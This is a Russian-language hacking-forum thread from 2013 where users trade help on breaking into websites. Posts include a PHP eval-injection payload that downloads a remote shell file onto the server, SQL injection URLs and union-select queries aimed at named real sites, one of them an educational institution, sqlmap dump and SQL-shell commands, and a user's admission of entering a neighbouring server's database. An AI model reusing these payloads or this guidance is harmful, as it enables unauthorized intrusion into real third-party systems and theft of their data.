Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Sat-hacker

    Sat-hacker New Member

    Joined:
    19 May 2012
    Messages:
    98
    Likes Received:
    0
    Reputations:
    -10
    Посоветуйте скрипт для поиска бекдоров шелов и т.д на сервере,кроме айболита.
     
  2. rogatiy

    rogatiy New Member

    Joined:
    3 Mar 2013
    Messages:
    49
    Likes Received:
    0
    Reputations:
    0
    Затерялся, похоже, мой вопрос в этой гуще.
     
  3. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    кавычки в eval можно обойти такой конструкцией:

    copy($_POST[a],$_POST)&a=http://site/shell.txt&b=shell.php
     
    _________________________
  4. rogatiy

    rogatiy New Member

    Joined:
    3 Mar 2013
    Messages:
    49
    Likes Received:
    0
    Reputations:
    0
    Warning: copy() [function.copy]: Unable to access in /hosting/htdocs/as/kernel/insert.inc.php(570) : eval()'d code on line 1

    Недостаточно прав? Давайте тогда уж рассматривать ситуацию с file_get_contents, там хоть более менее знакомо всё, хоть конфиги почитать получится. name={${eval(stripslashes(file_get_contents($_POST[ev])))}}&ev=http://site/shell.txt не проходит, код шелла без <?php ?>, то есть всё, вроде, кошерно
     
    #22004 rogatiy, 22 Mar 2013
    Last edited: 22 Mar 2013
  5. zloy_fantom

    zloy_fantom New Member

    Joined:
    3 Dec 2012
    Messages:
    46
    Likes Received:
    0
    Reputations:
    0
    Эт понятно, но любая база данных представляет собой набор файлов, расположенных в определенной директории. Из вашего утверждения следует, что на основании предоставленных мной данных невозможно узнать расположение файлов базы данных и их имена? Какую еще информацию нужно для этого получить?
    Спасибо
     
  6. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    rogatiy
    А не проще, выложить УРЛ или отписать кому-то в ПМ, что бы помогли, а не играть тут в игру "сделайте, то не зная, что где и как" на 5 страниц темы! т.к. того, что Вы предоставили может не хватать и что бы узнать, что конкретно не дает Вам добиться полноценного шелла на сайте, зачем людей заставлять играть в угадайку: "а может так, получиться, а так не пробовали..."
     
    #22006 cat1vo, 22 Mar 2013
    Last edited: 22 Mar 2013
  7. NECHISTb

    NECHISTb New Member

    Joined:
    20 Mar 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте. В поисках уязвимостей на сайте учебного заведения наткнулся на вот такой баг. _http://www.sibcol.ru/system/download/ Как я понял с помощью этого даонлодэра можно залить шелл. Вопрос в том куда в итоге попадают загруженные файлы? В корне и в этой самой дирректории залитые файлы не находятся.
     
  8. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,801
    Likes Received:
    920
    Reputations:
    862
    Игра есть такая. "Прятки" называется. Вот когда ты находишь подобную форму для аплоада - ты невольно подписываешься на её участие. И каждый раз итоговая папка может быть спрятана хз где...

    З.Ы. У тебя кроме раскрытия путей, вроде бы, ничего полезного сделать нельзя.
     
    _________________________
  9. NECHISTb

    NECHISTb New Member

    Joined:
    20 Mar 2013
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Дело в том что и на закрытые страницы которые указаны в robots.txt по адресу _http://www.sibcol.ru/system/sophos/IDES/
    я не могу попасть... Есть ли способ отследить загрузку файла?
     
  10. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    какую загрузку?? таф функция file_get_contents ты моксимум чо сможешь сделать это профитать исходники файлов на сервере
     
  11. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    del/
     
    #22011 Massay, 23 Mar 2013
    Last edited: 24 Mar 2013
  12. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Ну для начало не помешало бы ознакомиться с тематикой раздела и понять какого рода сдесь посты выкладываются...
     
    _________________________
  13. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    дмитрий

    Как еще можно обойти фильтрацию union+select? переносы строк, /*!, urlencode не помогает
     
    #22013 попугай, 24 Mar 2013
    Last edited: 24 Mar 2013
    1 person likes this.
  14. Zahar

    Zahar Banned

    Joined:
    17 Mar 2008
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    Help

    Парни, прошу помощи
    крутил его по разному, и не пойму есть уязвимость или ее никак не разколоть?
     
  15. skrutcher

    skrutcher New Member

    Joined:
    17 Jul 2011
    Messages:
    17
    Likes Received:
    1
    Reputations:
    0
    вопрос
    где именно в php nuke находится адрес сайта?
    пролез в бд соседнего сервера, а адрес найти не могу
     
  16. pinch

    pinch Elder - Старейшина

    Joined:
    13 Dec 2009
    Messages:
    417
    Likes Received:
    46
    Reputations:
    40
    как в sqlmap использовать конструкцию "where"? допустим я хочу сдампить те строки где type=admin

    в гугле нашел только, дамп определенной колонки:
    python sqlmap.py -u http://site.com --dump -T member -C type
     
  17. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Сделайте интерактивный SQL Shell и работайте через него и уже там указывайте выборку и условия.
    python sqlmap.py --url="http://site.com" --sql-shell
     
    1 person likes this.
  18. HackCrack

    HackCrack New Member

    Joined:
    19 May 2012
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Не понимаю, как раскрутить скулю.
    Code:
    http://www.rstomat.ru/qwe.php?id=14'+UNION+SELECT+1,2,3,4,+--+
    Менял пробелы, менял цифры, а ошибка одна и та же. Так же и с GROUP BY и ORDER BY.
    Хавжи раскручивает скулю на раз, а мне интересно научится руками.
    Что я делаю не правильно?
    Спасибо за разъяснения.
     
    #22018 HackCrack, 25 Mar 2013
    Last edited: 25 Mar 2013
  19. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    Вопервых кавычка в вашем случае экранируется, во вторых там 5 полей вот рабочий пример:
     
    _________________________
  20. HackCrack

    HackCrack New Member

    Joined:
    19 May 2012
    Messages:
    8
    Likes Received:
    1
    Reputations:
    0
    Спасибо.
    Теперь проблема в том, чтобы получить названия таблиц.
    Code:
    http://www.rstomat.ru/qwe.php?id=-14+union+select+1,2,3,TABLE_NAME,5+from+information_schema.tables+limit+4,1+--+
    Выводит названия таблиц information_schema типа CHARACTER_SETS, CLIENT_STATISTICS, COLLATIONS и так далее..

    Как получить нужные таблицы?

    PS. пробелы в слове information не удаляются в сообщении. В юрл-строке их нету.
     
    #22020 HackCrack, 25 Mar 2013
    Last edited: 25 Mar 2013
Thread Status:
Not open for further replies.